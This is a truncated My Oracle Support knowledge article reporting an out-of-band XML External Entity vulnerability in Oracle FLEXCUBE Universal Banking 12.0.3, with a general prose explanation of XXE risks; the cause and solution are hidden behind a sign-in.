My Oracle Support Banner

XML External Entity Injection (Doc ID 2661459.1)

Last updated on SEPTEMBER 10, 2020

Applies to:

Oracle FLEXCUBE Universal Banking - Version 12.0.3 and later
Information in this document applies to any platform.

Symptoms

On : 12.0.3 version, Production Support-SET

ACTUAL BEHAVIOR
---------------
XML External Entity Injection showing sensitive data.



EXPECTED BEHAVIOR
-----------------------
application server should not show sensitive information

STEPS
-----------------------
The issue can be reproduced at will with the following steps:
1. CVA 0999 XML External Entity (XXE) Out-Of-Band vulnerability was found in Flexcube application (Intranet facing Post-Auth).
This vulnerability could allow an attacker to potentially read arbitrary local files from the application server to expose sensitive information and consume memory resources
XML External Entity attacks benefit from an XML feature to build documents dynamically at the time of processing. It allows inclusion of data dynamically from a given resource.
External entities can force the XML parser to access the resource specified by the URI, (a file on the local machine or on a remote system). This behavior exposes the application to XML External Entity (XXE) attacks. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.


Cause

To view full details, sign in with your My Oracle Support account.

Don't have a My Oracle Support account? Click to get started!


In this Document
Symptoms
Cause
Solution
References


My Oracle Support provides customers with access to over a million knowledge articles and a vibrant support community of peers and Oracle experts.